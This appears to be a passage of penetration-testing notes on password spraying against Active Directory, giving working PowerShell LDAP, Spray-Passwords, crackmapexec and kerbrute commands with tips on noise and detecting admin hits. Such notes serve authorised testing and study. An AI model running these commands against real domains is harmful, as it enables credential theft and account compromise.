2. Password Attacks

Enumerate account policy:

net accounts

Manual LDAP Password Attack:

• Local method
• Low and slow attack method
• Run lines separately or as a script

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
New-Object System.DirectoryServices.DirectoryEntry($SearchString, "<user>", "<password>")

• If credentials are correct the object creation is successful

Automatic LDAP Attack with Spray-Passwords:

• https://github.com/ZilentJack/Spray-Passwords
• Does not require any admin access.
• Generates a lot of traffic and is not opsec safe
• Usage:

.\Spray-Passwords.ps1 -Pass Nexus123! -Admin

#Multiple passwords: -Pass 'Password1,Password2'
#Download wordlist: -Url <url>

SMB Password Attack with crackmapexec:

• Remote method
• Crackmap does not take password policy into account so be cautious
• Traditional attack approach in AD
• Drawback that full SMB connection has to be made for every try
• Very noisy and quite slow

sudo crackmapexec smb <ip-on-domain> -u users.txt -p 'Nexus123!' -d <domain> --continue-on-success

• "Pwn3d!" indicates admin user!

Kerberos TGT Attack with kerbrute:

• Cross-platform method
• If username and password are correct a cached Kerberos ticket is obtained.
• Only uses two UDP frames every try (only AS-REQ).
• Local usage:

.\kerbrute_windows_amd64.exe passwordspray -d <domain> .\usernames.txt "password123!"

• If receives network error make sure usernames file is of ANSI encoding.